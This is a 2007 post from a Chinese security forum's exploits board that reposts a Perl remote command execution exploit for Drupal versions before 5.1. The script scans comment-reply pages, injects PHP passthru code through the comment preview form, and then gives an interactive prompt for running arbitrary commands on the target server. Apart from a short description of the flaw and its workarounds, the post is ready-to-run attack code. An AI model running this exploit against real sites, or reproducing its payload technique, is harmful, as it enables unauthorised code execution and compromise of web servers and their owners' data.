Drupal < 5.1 (post comments) Remote Command Execution Exploit v2

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1109 小时
注册时间: 2007-10-23
最后登录: 2008-9-7

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-2-16 11:41 只看该作者

Drupal < 5.1 (post comments) Remote Command Execution Exploit v2

复制内容到剪贴板

代码:

#!/usr/bin/perl



#

# $Id: milw0rm_drupalv5.pl,v 0.2 2007/02/15 13:40:29 str0ke Exp $

# 

# milw0rm_drupalv5.pl - Drupal < 5.1 Remote Command Execution Exploit

# Copyright (c) 2007 str0ke <str0ke[!]milw0rm.com>

# 

# Description

# -----------

# Previews on comments were not passed through normal form validation routines,

# enabling users with the &#39;post comments&#39; permission and access to more than one

# input filter to execute arbitrary code. By default, anonymous and authenticated

# users have access to only one input format.

# Immediate workarounds include: disabling the comment module, revoking the &#39;post 

# comments&#39; permission for all users or limiting access to one input format.

# Versions affected

# -----------------

# - Drupal 5.x versions before Drupal 5.1

#

# [02/15/2007] The exploit has been fixed. /str0ke

#



use strict;

use LWP::UserAgent;



my $host  = shift || &usage;

my $dir  = shift || "/drupal";

my $proxy = shift;

my $command;



my $conn = LWP::UserAgent->new();

$conn -> proxy("http", "http://".$proxy."/") unless !$proxy;



sub usage() 

{

  print "[?] Drupal < 5.1 Remote Command Execution Exploit\n";

  print "[?] Copyright (c) 2007 str0ke <str0ke[!]milw0rm.com>\n";

  print "[?] usage: perl $0 [host] [directory] [proxy]\n";

  print "   [host] (ex. www.milw0rm.com)\n";

  print "   [directory] (ex. /drupal)\n";

  print "   [proxy] (ex. 0.0.0.0:8080)\n";

  exit;

}



sub exploit() 

{

  my $i = $_[0];

  my $command = $_[1] || &#39;ls -l&#39;;

  my $cmd    = &#39;echo start_er;&#39;.$command.&#39;;&#39;.&#39;echo end_er&#39;;



  my $byte = join(&#39;.&#39;, map { $_ = &#39;chr(&#39;.$_.&#39;)&#39; } unpack(&#39;C*&#39;, $cmd));

  

  my $req = HTTP::Request->new(POST => "http://" . $host . $dir . "/?q=comment/reply/" . $i);

  $req -> content_type(&#39;application/x-www-form-urlencoded&#39;);

  $req -> content(&#39;subject=My daddy beats me&comment=<?passthru(&#39;.$byte.&#39;);?>&format=2&form_id=comment_form&op=Preview comment&#39;);



  my $content = $conn->request($req);

  

  if ($content->content =~ m/start_er(.*?)end_er/ms) {

    my $out = $1;



    if ($out) {

      print "$out\n";

    } else {

      print "[-] Exploit Failed...\n";

      exit;

    }  

  }  

}



for my $i ( 1 .. 400 ) {

  my $output = $conn -> get("http://" . $host . $dir . "/?q=comment/reply/" . $i);



  if($output -> is_success)

  {

    if($output -> content =~ /add new comment/)

    {

      print "[+] found comment/reply: $i\n";



      &exploit($i);

      

      while()

      {

        print "str0kin-drupal\$ ";

        chomp($command = <STDIN>);

        exit unless $command;

        &exploit($i, $command);

      }

      exit;

    }

  }

}



print "[-] Exploit Failed...\n";

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Drupal < 5.1 (post comments) Remote Command Execution Exploit v2

Drupal &lt; 5.1 (post comments) Remote Command Execution Exploit v2

Drupal &lt; 5.1 (post comments) Remote Command Execution Exploit v2

代码:

Drupal < 5.1 (post comments) Remote Command Execution Exploit v2

Drupal < 5.1 (post comments) Remote Command Execution Exploit v2